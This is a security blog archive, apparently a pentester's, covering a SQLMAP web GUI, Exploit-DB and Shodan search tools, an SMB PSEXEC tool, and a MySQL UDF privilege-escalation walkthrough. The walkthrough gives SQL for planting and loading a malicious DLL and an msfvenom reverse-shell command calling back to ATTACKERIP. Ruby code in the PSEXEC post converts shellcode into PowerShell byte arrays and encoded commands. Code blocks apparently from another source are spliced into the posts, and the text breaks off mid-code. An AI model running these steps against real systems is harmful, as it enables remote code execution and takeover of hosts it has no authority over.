Kaotic Creations, by HR<br />
<br />
<u><b>SQLMAP Web GUI</b></u> (2015-03-19)<br />
It has certainly been a while :)<br />
<br />
The last few weeks I have been teaching myself a little PHP to help improve my skills and knowledge. In the process I decided to try and make a Web GUI for SQLMAP. When I originally started I was unaware of the JSON API they already have available through sqlmapapi.py (available in the latest versions of the GitHub repo). The API itself is not really documented anywhere, so I took it as a small challenge to see what I might be able to slap together. You can find most of the API functionality documented to the best of my ability in the SQLMAPClientAPI.class.php file I wrote; hopefully it will be helpful to others in the future who look to expand or write cooler GUIs and apps for the API.<br />
<br />
Quick View of the core SQLMAPClientAPI.class.php:
<a href="http://pastebin.com/ppYhaxwW" target="_blank">http://pastebin.com/ppYhaxwW</a><br />
<br />
<br />
<br />
Now once I had that working, I decided to dive on into trying to make a front end. To date, I have only ever really tried breaking web applications, never really building them (I think I learned things backwards and wouldn't advise this path to others). I decided to use Bootstrap since it was easy to pick up and run with and well documented. The look is clean and simple for now; it meets my minimum acceptability test I suppose, but leaves lots of room for improvements if you do this on a regular basis. I documented things in the source as best I could, where I could, but nothing too magical with the front end work and, as I said, plenty of room for further improvements...<br />
<br />
A few snapshots to show off the basic view:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/oK9oyI4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/oK9oyI4.png" height="328" width="400" /></a></div>
<br />
<br />
I broke the form up into tabbed areas to make it all a little easier to swallow, since SQLMAP has a whole lot of options to configure scans with. The actual scan opens in a new tab so you don't lose all the form data, which lets you continue enumerating the target as you build up info (I like it this way :p).<br />
<br />
<b>Request modifications:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/FafmKwa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/FafmKwa.png" height="268" width="400" /></a></div>
<br />
<b>Detection modifications:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/z0G63xN.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/z0G63xN.png" height="291" width="400" /></a></div>
<br />
<br />
<b>Injection & Technique modifications:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/6vl5YMa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/6vl5YMa.png" height="291" width="400" /></a></div>
<br />
<br />
<b>Enumeration & Data Dumping modifications:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/etZnE4z.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/etZnE4z.png" height="291" width="400" /></a></div>
<br />
<br />
<b>System Access & Advanced Exploitations:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/Zb436l3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/Zb436l3.png" height="291" width="400" /></a></div>
<br />
You can find the code on Github for your forking, pulling, and pushing delights: <a href="https://github.com/Hood3dRob1n/SQLMAP-Web-GUI" target="_blank">https://github.com/Hood3dRob1n/SQLMAP-Web-GUI</a><br />
<br />
<u><b>How to get things setup:</b></u><br />
<ul>
<li> Install SQLMAP and all necessary dependencies per the standard sqlmap instructions...</li>
<li> Get a basic LAMP setup going per your favorite distro's guide</li>
<ul>
<li> <b>NOTE: </b>MySQL is not being used for this project at this point in time</li>
</ul>
<li> Download the Web GUI files from my new github repo I created (<a href="https://github.com/Hood3dRob1n/SQLMAP-Web-GUI">https://github.com/Hood3dRob1n/SQLMAP-Web-GUI</a>)</li>
<ul>
<li>Edit sqlmap/inc/config.php from the GUI files so the correct paths are in place for your box</li>
<li>Then copy all the web_gui/sqlmap/ files to the web root directory for your server, e.g. /var/www/sqlmap/</li>
</ul>
<li> Start up the API server (sqlmapapi.py -s) when you want to use it, otherwise the GUI will fail</li>
<li> Surf to your new SQLMAP Web GUI in your browser and enjoy</li>
</ul>
<br />
Here are a few quick videos I made to show that almost all of your usual SQLMAP command line functionality is still possible via the Web GUI. <br />
<br />
<b>Demo against: Windows 2003 Server, IIS/6.0 + ASP + MS-SQL 2005</b><br />
<a href="https://www.youtube.com/watch?v=8MRew20Q1xE" target="_blank">https://www.youtube.com/watch?v=8MRew20Q1xE</a><br />
<br />
<br />
<b>Demo against: Linux (CentOS), Apache, MySQL, PHP</b><br />
<a href="https://www.youtube.com/watch?v=cs2Gvss0v-k" target="_blank">https://www.youtube.com/watch?v=cs2Gvss0v-k</a><br />
<br />
<br />
<br />
<br />
It is entirely possible to run the API server on one host while the Web GUI front end runs on a different host; simply make the proper edits to the config file so they can communicate. Keep in mind that the API server itself does no authentication, so if it listens on anything other than loopback it should only be reachable from the GUI host. There still remain a few obstacles in some advanced functions I want to add, due to how the API server works. I plan to work on them as time goes on. I had several friends tell me to put this out there, and I feel happy enough with where things are for now that I decided to share with everyone who might be interested.<br />
<br />
Open to suggestions and feedback, hope you guys like it!<br />
<br />
<br />
<u><b>My Current ToDo List:</b></u><br />
<ul>
<li>Ask the SQLMAP team to modify the logger or work with me on how to extract the info log while it is running a scan</li>
<ul>
<li>Would love to present scan log info while the spinner is running during an active scan so you know what is going on</li>
<li>Currently the scan log info seems to be set in a blocking manner, so the active scan needs to finish before logs can be parsed/extracted from the API</li>
<li>The admin panel seems to suffer from this blocking behavior as well.</li>
<ul>
<li>I would like to improve this function/feature in the future, but the current blocking behavior makes it too annoying to work on for now</li>
</ul>
</ul>
<li>Ask the SQLMAP team to modify the --answer delimiter value or allow a custom one to be set</li>
<ul>
<li>Affects the ability to pass in more than one path when using the file write options (which take a CSV list of paths, but --answer mistakes them for multiple answers instead)</li>
</ul>
<li>Ask if the MSF advanced exploit options (--os-pwn, --os-smb, --os-bof, --priv-esc) could be prompted differently</li>
<ul>
<li>Currently the assumption is that the sqlmap attack box is also the box that should accept the MSF payload callbacks</li>
<li>Should allow a new option so the user can specify a remote IP and port instead of the local IP/port</li>
<li>The current setup causes the API to hang in an infinite loop if a remote IP/port is specified</li>
<li>The GUI version of these is disabled until this can be fixed</li>
</ul>
<li>The --os-cmd option doesn't seem to return output to the API properly with MySQL (works fine for MS-SQL); more testing needed before reporting a bug, if it is indeed a bug...</li>
<li>Ask if the SQLMAP team would consider moving away from Python's pickle module for serializing the options passed from the API to the CLI</li>
<ul>
<li>Also use a different web server that doesn't rely on the same pickle method</li>
<li>pickle.loads() on untrusted data is known to be susceptible to Python object injection attacks that can lead to code execution</li>
<li>The current use of the API server doesn't call the vulnerable cookie decoder that the Bottle server has built in, so it is safe for now...</li>
<ul>
<li>Currently my attempts to find a working exploit seem to break the JSON, which stops it from passing through to be executed by sqlmap</li>
<li>I'm concerned someone smarter than me can figure it out and find a way to sneak some pickled Python code through to achieve RCE</li>
<li>If you know how, please show or send me a quick POC as I would love to see how it is accomplished in this particular situation</li>
</ul>
<li>Until this is addressed or confirmed safe by more people, I can't widely suggest or really recommend running this Web GUI on an open web-facing server for untrusted users of the interwebs</li>
<li>Did my best to secure the few areas I found problems with in trying to make it safe to be web-facing</li>
<ul>
<li>Nothing can be done without the API server running, so it is secure enough for me to use locally or spin up as needed; you will need to decide on your own security...</li>
</ul>
</ul>
<li>Add options to config.php to allow settings or levels that activate and expose some of the other options not currently available</li>
<ul>
<li>evalCode, proxy options, Tor use, etc.</li>
</ul>
<li>Do more testing:</li>
<ul>
<li>May have some issues with PHP < 5.3; not tested, and I'm still a PHP n00b so all bets are off...</li>
<li>Setups Confirmed Working:</li>
<ul>
<li>Debian 7, PHP 5.4.4-14+deb7u14</li>
<li>Debian 7, PHP 5.4.36-0+deb7u3</li>
<li>Ubuntu 12, PHP 5.3.10-1ubuntu3.17</li>
<li>Kali w/PHP 5.4</li>
</ul>
</ul>
</ul>
<br />
<u><b>Searchsploit-rb - Exploit-DB Search Tool gets an upgrade?</b></u> (2014-01-13)<br />
<a href="http://www.exploit-db.com/" target="_blank">Exploit-DB</a> is pretty famous for their collection of exploits and papers, and if you are not familiar with them then you should use some Google-fu to check up on them. They should be a bookmark found in pretty much any hacker's handbook. In the past they had made their full archive available for download over HTTP, which was shaky at best, and unless you scheduled it with cron or something you never knew if you had the latest and greatest; updating in a scripted manner was not always reliable (for me anyways). I had previously coded this tool for the old archive methods, but today I noticed on Reddit they have moved to GitHub - w00t! This makes things much easier for everyone, well most people anyway.<br /><br />Now they have had their archive collection for some time and the searchsploit bash script works just fine; however, it can be too simplistic at times and not yield the results we want unless you match your search syntax to its janky search method. It also lacks color and output logging. I had some time this morning so I decided to update my old script to take advantage of the simplicity of GitHub, to allow easy fetching of new copies and/or updating existing ones. I also added a bit of color to the presentation of the results. It's very helpful for me so I thought I would share with the rest of you...<br /><br />
To download the exploit-db archive on your own from the command line using the normal git client:<br />COMMAND: git clone https://github.com/offensive-security/exploit-database.git<br /><br />Then to update from the command line when you want, simply pull (from inside the cloned directory):<br />COMMAND: git pull<br /><br />This can all be done from within my tool, so now you can update and search from one place :) Here is a quick overview and a link to my GitHub page where you can find it.<br /><br />Help Menu:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/bHDa92C.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://i.imgur.com/bHDa92C.png" width="400" /></a></div>
<br />
<br />
<br />
If it can't find the archive setup, it will offer to download via git for you:<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/b8IcaFg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="http://i.imgur.com/b8IcaFg.png" width="400" /></a></div>
<br />
Search by a range of options with option to log results to file:<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/SwObzJQ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/SwObzJQ.png" width="400" /></a></div>
<br />
<br />
<b>NOTE:</b> this can be handy when you get a lot of results (SQL Injection searches mostly...)<br />
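As an added example (not searchsploit-rb itself, whose source is on GitHub): the core of a search over a local exploit-database clone, matching every keyword independently and case-insensitively instead of searchsploit's fixed-order string match, with platform/type filters and a plain-text log format. The clone's files.csv (2014 layout) has the columns id,file,description,date,author,platform,type,port; the rows embedded below are constructed so the example runs offline, and the ids and descriptions in them are not real Exploit-DB entries.<br />

```ruby
require 'csv'

# Constructed stand-in for exploit-database/files.csv (same header the 2014 clone
# used). Real usage: ExploitDbSearch.new(csv_text: File.read('exploit-database/files.csv'))
SAMPLE_FILES_CSV = <<~CSV
  id,file,description,date,author,platform,type,port
  1001,platforms/php/webapps/1001.txt,"Example CMS 1.2 - 'id' SQL Injection",2013-05-01,someone,php,webapps,0
  1002,platforms/windows/remote/1002.rb,"Example FTPd 2.0 - Remote Buffer Overflow (Metasploit)",2013-06-12,someone,windows,remote,21
  1003,platforms/linux/local/1003.c,"Example Kernel 3.x - Local Privilege Escalation",2013-07-20,someone,linux,local,0
  1004,platforms/php/webapps/1004.txt,"Example CMS 1.3 - Blind SQL Injection",2013-08-02,someone,php,webapps,0
CSV

class ExploitDbSearch
  Entry = Struct.new(:id, :file, :description, :date, :author, :platform, :type, :port)

  def initialize(csv_text:)
    @entries = CSV.parse(csv_text, headers: true).map do |row|
      Entry.new(*row.values_at('id', 'file', 'description', 'date', 'author', 'platform', 'type', 'port'))
    end
  end

  # Every term must match (case-insensitive) somewhere in the description or
  # file path, in any order. Optional platform/type filters narrow the set.
  def search(terms, platform: nil, type: nil)
    needles = terms.map { |t| Regexp.new(Regexp.escape(t), Regexp::IGNORECASE) }
    @entries.select do |e|
      haystack = "#{e.description} #{e.file}"
      needles.all? { |n| haystack =~ n } &&
        (platform.nil? || e.platform.casecmp?(platform)) &&
        (type.nil? || e.type.casecmp?(type))
    end
  end

  # Plain-text rendering of a result set, the same lines you would log to a file.
  def format_results(results)
    results.map { |e| "[#{e.id}] #{e.description} (#{e.platform}/#{e.type}) -> #{e.file}" }.join("\n")
  end
end

if $PROGRAM_NAME == __FILE__
  db = ExploitDbSearch.new(csv_text: SAMPLE_FILES_CSV)
  puts db.format_results(db.search(%w[cms sql], type: 'webapps'))
end
```

Matching on the file path as well as the description is what lets a query like <b>windows remote</b> pull in entries whose description never says "windows".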
<br />
Easy peazy updating now that things can leverage Github:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/YGXDVtf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="http://i.imgur.com/YGXDVtf.png" width="400" /></a></div>
<br />
<br />
<br />
You can find things on <a href="https://raw.github.com/Hood3dRob1n/Exploit-DB-Local-Archive-Search-Tool/master/searchsploit-rb" target="_blank">my GitHub page</a>:<br />git clone https://github.com/Hood3dRob1n/Exploit-DB-Local-Archive-Search-Tool.git<br /><br />You should only need to install the 'colorize' gem to get things started with Ruby:<br />
sudo gem install colorize<br />
<br />
<br />
<br />
<br />
<br />
Special thanks to everyone on the <a href="http://www.offensive-security.com/" target="_blank">Offensive Security</a> team that helps to make <a href="http://www.exploit-db.com/" target="_blank">exploit-db</a> and all of their other awesome projects possible!<br />
<br />
Until next time, enjoy!<br />
<br />
<u><b>Shodan Search Tool w/My Ruby API Class</b></u> (2014-01-08)<br />
Today I just wanted to share a little something I made for <a href="http://www.shodanhq.com/" target="_blank">Shodan</a>. If you don't know what <a href="http://www.shodanhq.com/" target="_blank">Shodan</a> is, then I highly recommend you check them out and do some quick googling to see what others have done with its help. I initially tried using their published Ruby gem and published API documentation, but it failed miserably (likely could just be me, but it seems their code is outdated with how their site provides output now, idk). I really like <a href="http://www.shodanhq.com/" target="_blank">Shodan</a> though, so I decided to create my own version of their API so I could get started on making a cool search assistant I can run from the command line with some basic logging for analysis after. Once I finished redoing the API class, I made a little CLI-based search tool to make quick Shodan research a snap, and am now sharing it with the rest of the world; hope it's helpful for others.<br />
<br />
<b>Prerequisites:</b><br />
sudo gem install colorize curb json nokogiri<br />
<br />NOTE: curb uses libcurl under the hood, so you might need to install it (and its development headers) if not already present on your OS <br />
<br />
Basic Help Menu:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/ETEpRuJ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/ETEpRuJ.png" height="321" width="400" /></a></div>
<br />
<br />
You can run a basic Shodan search and display the results, which are also logged to the results folder.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/dfsB8Ci.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/dfsB8Ci.png" height="225" width="400" /></a></div>
<br />
<br />
The logged results are overwritten on each search so you need to rename it or move it if you want to use it later and plan to run multiple searches. <br />
<br />
I also made a quick search option, which runs a Shodan search and returns just the list of IP addresses from the results, skipping all the details. I typically run a normal search, then a follow-up quick search on the same keywords to pass off lists to other tools in a speedy fashion, while manual review is more involved with the full search results...<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/eR4PhMa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/eR4PhMa.png" height="225" width="400" /></a></div>
<br />
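As an added example (not the post's API class or search tool): the result handling the two modes above come down to, run over a constructed, Shodan-shaped JSON document so it works offline. The sample mirrors the parts of a Shodan search response the tool cares about (a "matches" array with ip, port, hostnames and the raw banner in "data"); the addresses and banners in it are made up. The log writer uses a timestamped file name, which avoids the overwrite-on-every-search behaviour noted earlier.<br />

```ruby
require 'json'
require 'fileutils'
require 'time'

# Constructed sample shaped like a Shodan search response (not captured data).
SAMPLE_SHODAN_JSON = <<~JSON
  {"total": 3, "matches": [
    {"ip": "198.51.100.10", "port": 80,  "hostnames": ["web.example"], "data": "HTTP/1.1 200 OK\\r\\nServer: Apache/2.2.15 (CentOS)\\r\\n"},
    {"ip": "198.51.100.10", "port": 443, "hostnames": ["web.example"], "data": "HTTP/1.1 200 OK\\r\\nServer: Apache/2.2.15 (CentOS)\\r\\n"},
    {"ip": "203.0.113.7",   "port": 21,  "hostnames": [],              "data": "220 ProFTPD 1.3.3 Server ready.\\r\\n"}
  ]}
JSON

class ShodanResults
  Match = Struct.new(:ip, :port, :hostnames, :banner)

  def initialize(json_text)
    @matches = JSON.parse(json_text).fetch('matches', []).map do |m|
      Match.new(m['ip'], m['port'], Array(m['hostnames']), m['data'].to_s)
    end
  end

  # "Quick search" view: unique IPs only, ready to hand to nmap or other tools.
  def quick_ips
    @matches.map(&:ip).uniq
  end

  # Full view: one line per host/port with hostnames and the first banner line.
  def full_lines
    @matches.map do |m|
      "#{m.ip}:#{m.port} #{m.hostnames.join(',')} | #{m.banner.lines.first.to_s.strip}"
    end
  end

  # Write the full view to <dir>/<UTC timestamp>_<query slug>.txt so that a
  # second search never clobbers the first. Returns the path written.
  def log(dir, query, now: Time.now)
    FileUtils.mkdir_p(dir)
    slug = query.gsub(/[^a-z0-9]+/i, '_')
    path = File.join(dir, "#{now.utc.strftime('%Y%m%dT%H%M%SZ')}_#{slug}.txt")
    File.write(path, (["query: #{query}"] + full_lines).join("\n") + "\n")
    path
  end
end

if $PROGRAM_NAME == __FILE__
  r = ShodanResults.new(SAMPLE_SHODAN_JSON)
  puts r.quick_ips
  puts r.log('results', 'apache centos')
end
```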
Shodan also offers up a nice search feature to search for exploits which leverages multiple exploit databases. I currently have the Exploit-db and Metasploit search engines available and fully working. This means you can easily search for known exploits with variety of keywords and get matching results displayed and logged for you. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/mHowhix.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/mHowhix.png" height="400" width="381" /></a></div>
<br />
You can even download the exploit/poc code from search results by referencing the ID number from results.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/bCDEa4U.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/bCDEa4U.png" height="225" width="400" /></a></div>
<br />
<u><b>ToDo List: </b></u><br />
Include options in the search tool for the premium search options (somewhat built into my API class already, but not in the tool). Include a Gemfile for easy installs for bundler lovers. Also, I have not uploaded things to GitHub yet as I fried my old box and lost a lot of stuff; still working on recovery but should have it updated soon. Until then you can find things on Pastebin, available for a long while...<br />
<br />
<u><b>My Shodan API Standalone Class:</b></u><br />
<br />
<b>Direct link: </b><a href="http://pastebin.com/q6LZJqcD">http://pastebin.com/q6LZJqcD</a><br />
<br />
<br />
<b><u>My Shodan API Search Tool, Source Code:</u></b><br />
<br />
<b>Direct Link: </b><a href="http://pastebin.com/B0SdmmrX">http://pastebin.com/B0SdmmrX</a><br />
<br />
Helpful for me, hope it is for you too!<br />
<br />
Until next time, Enjoy!<br />
<br />
<u><b>XMAS Gifts from ifixit.com for Bug Bounty</b></u> (2013-12-31)<br />
I just wanted to give a quick shout out to the nice folks over at <a href="http://ifixit.com/">ifixit.com</a>. I recently <a href="http://www.ifixit.com/Info/Responsible_Disclosure" target="_blank">submitted</a> a few small bugs to them, and they were hands down the nicest folks I have ever communicated with when it comes to reporting bugs! They were very responsive in all communications and in patching the site. They added me to their <a href="http://www.ifixit.com/Info/Responsible_Disclosure" target="_blank">responsible disclosure page</a> and even sent me some nice swag as an added thanks. The gear arrived on Christmas morning, which made my day even better! Thanks <a href="http://ifixit.com/">ifixit.com</a><br />
<br />
T-Shirt, Handy Mini Toolset & Stickers:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/MuUsLJW.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://i.imgur.com/MuUsLJW.jpg" width="300" /></a></div>
<br />
<u><b>Yet Another SMB PSEXEC (Y.A.S.P) Tool</b></u> (2013-11-08)<br />
I was working on my own version of an updated standalone PSEXEC tool in Ruby, leveraging the MSF standalone as a base along with some of the newer modules that have been released. Unfortunately SMBEXEC 2.0 was recently released, which pretty much does the same thing functionality-wise but has threading, so it's probably a bit cooler, but I thought I would still post mine out there for anyone who cares to take it for a spin. It is single-target focused and a little different in look and feel compared to some of the others available, so who knows. It works for me, hope it works for someone else too....<br />
<br />
I first started off trying to do things on my own by writing classes to wrap the smbclient tool, which now supports a pass-the-hash option or can be fairly easily patched to add it. The Samba suite also includes the rpcclient tool, which I originally planned to leverage to make some magic happen. Well, I got the wrappers working, but was not able to get things fully working with just these two classes. I do recommend playing around with rpcclient as it is an interesting tool and can lead to a lot of insight against a remote target, but that's another story. So after giving up on the rpcclient option I did some checking on the net and found some great references from Mubix and Chris Gates on the MSF standalone tool and some ways to play with it. As Chris and Rob point out, the librex library is available outside of MSF as a standalone gem, which gives you tons of power to do all kinds of neat things on your own. Being that the hard work was already done and available as reference in MSF, I decided to borrow what I could from there and merge it with my own wrappers and code to get what I wanted. The end result is an smbclient with all the psexec fun and then some.<br />
<br />
It can do some basic recon without creds, which I am working on improving, but its main focus is on re-using valid credentials. Once authenticated it's capable of running single commands using the PSEXEC technique or jumping into a pseudo-shell to execute multiple commands.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/NnAiy2Q.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/NnAiy2Q.png" width="400" /></a></div>
<br />
<br />
Download registry hives for offline pillaging<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/F7ITVRi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/F7ITVRi.png" width="400" /></a></div>
<br />
<br />
Leverage MSFVENOM to generate shellcode and then run payloads using PowerShell (my favorite):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/niGP7PY.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://i.imgur.com/niGP7PY.png" width="400" /></a></div>
<br />
NOTE: You need to specify the hostname for Vista+ targets or the connection will fail. You can use raw NetBIOS requests or a tool like nbtscan to find it pretty quickly and without any pain. On older targets you can omit this field from the connection configuration.<br />
<br />
The full list of available options once authenticated:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/sBJMVEh.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="381" src="http://i.imgur.com/sBJMVEh.png" width="400" /></a></div>
<br />
<br />
And here are a few demo videos I made to show off how you can use it....<br />
<br />
Y.A.S.P. vs Standalone 2k3 Server:<br />
<a href="https://www.youtube.com/watch?v=jA1THWguUtE" target="_blank">https://www.youtube.com/watch?v=jA1THWguUtE</a><br />
<br />
<br />
<br />
Y.A.S.P. + PowerShell Payload vs Windows 7:<br />
<a href="https://www.youtube.com/watch?v=2uqmDKHQk9M" target="_blank">https://www.youtube.com/watch?v=2uqmDKHQk9M</a><br />
NOTE: It currently leverages MSFVENOM to generate shellcode, which gets converted over to a PowerShell-acceptable format and then executed via a PowerShell command<br />
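Added example of just the conversion step that note describes (not Y.A.S.P.'s own code): raw shellcode bytes, as <b>msfvenom -f raw</b> would emit them, become the PowerShell <b>[Byte[]]</b> literal, and a script string is packed into the UTF-16LE/Base64 form that <b>powershell -EncodedCommand</b> expects. The bytes used in the usage block are constructed filler, not a real payload, and the example stops at producing the literal; the injector that consumes it is left to the tool.<br />

```ruby
require 'base64'

module ShellcodeToPowerShell
  # "\xfc\xe8..." -> "0xfc,0xe8,..." (the form a PowerShell byte array accepts)
  def self.byte_array_literal(shellcode)
    shellcode.bytes.map { |b| format('0x%02x', b) }.join(',')
  end

  # One assignment line the rest of a PowerShell script can build on.
  def self.script(shellcode, var: '$sc')
    "[Byte[]] #{var} = #{byte_array_literal(shellcode)}"
  end

  # PowerShell decodes -EncodedCommand as Base64 over the UTF-16LE text of the
  # script, so the string has to be transcoded before it is encoded.
  def self.encoded_command(script_text)
    Base64.strict_encode64(script_text.encode('UTF-16LE').b)
  end

  # Inverse, handy on the defensive side for reading an observed
  # "powershell -EncodedCommand <blob>" out of process-creation logs.
  def self.decode_command(b64)
    Base64.strict_decode64(b64).force_encoding('UTF-16LE').encode('UTF-8')
  end
end

if $PROGRAM_NAME == __FILE__
  filler = "\xfc\xe8\x82\x00\x00\x00".b # constructed bytes, not a payload
  puts ShellcodeToPowerShell.script(filler)
  puts ShellcodeToPowerShell.encoded_command(ShellcodeToPowerShell.script(filler))
end
```

The round trip matters in both directions: the tool needs the encoder, and whoever is reading Sysmon or 4688 events later needs the decoder to see what the one-liner actually contained.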
<br />
<br />
<br />
<br />
Y.A.S.P. vs 2k3 Domain Controller + Active Directory Dumping 101:<br />
<a href="https://www.youtube.com/watch?v=1eSDw2me-6A" target="_blank">https://www.youtube.com/watch?v=1eSDw2me-6A</a><br />
<br />
<br />
<br />
You can find all the source code along with all the tools used or referenced in the above videos on my github page here: <a href="https://github.com/Hood3dRob1n/Y.A.S.P." target="_blank">SOURCE + TOOLS</a><br />
<br />
You can keep an eye on GitHub as I will be working on this one over time to smooth out a few things and add a few more things which I wasn't comfortable rolling out just yet, but again, just sharing to share and inspire more coders to code cool shit. Until next time, Enjoy!<br />
<br />
<u><b>Battling Windows MySQL: From root to SYSTEM (Part II: User Defined Function (UDF) Exploitation)</b></u> (2013-10-19, updated 2014-01-31)<br />
This is part 2 of a 2-part series on exploiting Windows MySQL instances to gain high-privileged shell access. This part focuses on exploiting MySQL User Defined Functions (UDF) by feeding them malicious DLL files at function creation and linkage time. The method follows a very similar course to our first .MOF exploitation technique: we will need to upload a binary payload, this time a DLL file instead of an EXE, which should not really affect the upload method we created previously. Our magic location will be changing however....<br />
<br />
MySQL has a feature that allows administrative users to add functions to extend its abilities. These User Defined Functions are mapped to a .so file on Unix systems or a .dll file on Windows at function creation time, and it is this linked trust that we exploit to gain code execution. MySQL loads these libraries from its plugin directory, which you can get with the query <b>SELECT @@plugin_dir;</b> (the variable is <b>plugin_dir</b>, present from MySQL 5.1 onward). If it is not available for whatever reason, run <b>SHOW VARIABLES LIKE 'basedir';</b> and append 'lib/plugin/' to the value you get back. Writing the DLL there with SELECT ... INTO DUMPFILE needs the FILE privilege and a <b>secure_file_priv</b> setting that does not restrict the target directory. Make sure you escape backslashes in the path when re-using this value in your code (each one must be doubled inside the SQL string literal) or you will run into issues ;) <br />
<br />
We upload a binary (payload.dll) to the plugin directory (e.g. c:\SOMEPATH\bin\mysql\mysql5.5.24\lib\plugin\)... using our code from part I this is easily accomplished...<br />
<br />
We then create a function which triggers our DLL payload:<br />
<b>SQL QUERY: </b>CREATE FUNCTION fake_function_name RETURNS string SONAME 'payload.dll';<br />
<br />
MySQL will look in the plugin directory for 'payload.dll', load it into memory, and then look for the symbols it needs to build the function and make it available to users. If you load a legitimate UDF DLL/SO file, the function is created and you can use it in MySQL immediately after. If the file is not a valid library, or it loads but does not export the named function and its helper symbols, the CREATE FUNCTION fails. That is no real concern to us hackers/auditors/pentesters/whoever you are, because at that point it is already over: the code runs as soon as the library is loaded for the symbol check (on Windows, from the DLL's DllMain entry point). The DLL will remain on the target, and since no function was created there is nothing to DROP FUNCTION afterwards, so the file has to be removed some other way. You can generate DLL payload files with MSF fairly easily, which makes it nice to pass things off to MSF. In my experience it is best to roll in first with a standard command shell and then use the MSF session upgrade option to go from a plain shell to a meterpreter session. It runs the needed commands through the existing channel and then, via a command stager, opens a new connection for meterpreter, so you end up with two sessions when it completes. <br />
<b><br /></b>
<b>MSFVENOM PAYLOAD GENERATION: </b>msfvenom -p windows/shell/reverse_tcp LHOST=ATTACKERIP LPORT=4444 -f dll > payload.dll<br />
<b>MSF SESSION UPGRADE (Post Exploit):</b> sessions -u <sessionID#><br />
<br />
New Ruby Code Additions to our previous snippet (write_bin_file() was used to house our code from part I for uploading):<br />
<br />
<a href="http://pastebin.com/H7zNtC9B" target="_blank">http://pastebin.com/H7zNtC9B</a><br />
Now the author of SQLMAP helped write and publish a set of custom user defined functions (lib_mysqludf_sys) that let you interact with the underlying operating system. We can upload that library and create its functions, which then let us execute commands through plain SQL queries. The package ships a handful of functions (sys_get, sys_set, sys_exec and sys_eval, plus sys_bineval in sqlmap's fork), but for us only two matter: sys_exec() and sys_eval(). The first, sys_exec(), runs a system command and returns only its exit status (0 on success, non-zero otherwise), so it is good for blind command execution. If you need the command's output you want sys_eval(), which runs the command AND returns what it printed. The key when setting up your new functions is declaring the return type correctly to match what the library exports. If you have uploaded lib_mysqludf_sys.dll into the plugin directory, the following queries load the two functions:<br />
<br />
<b>SQL: </b>CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.dll';<br />
<b>SQL:</b> CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.dll';<br />
<b>NOTE: </b>mind the INT vs STRING return types: sys_exec returns an integer exit code while sys_eval returns the command output as a string, and MySQL calls the function according to the declared type, so a mismatch will not behave as expected!<br />
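Added example (not the post's Ruby, which is on Pastebin): a generator for the SQL statements behind the upload-and-CREATE FUNCTION sequence above, covering the two details that bite in practice: the DLL body goes in as a 0x... hex literal so SELECT ... INTO DUMPFILE writes it byte-for-byte, and every backslash in the Windows target path has to be doubled inside the string literal. The plugin path, DLL bytes and file names used in the usage block are illustrative, not real ones.<br />

```ruby
# Builds (does not send) the SQL for the UDF technique: discover plugin_dir,
# write the library there with DUMPFILE, then register the functions.
module MysqlUdfSql
  PLUGIN_DIR_QUERY = 'SELECT @@plugin_dir;'
  BASEDIR_QUERY    = "SHOW VARIABLES LIKE 'basedir';"

  # Escape a path for use inside a single-quoted MySQL string literal:
  # each backslash becomes two, each single quote is backslash-escaped.
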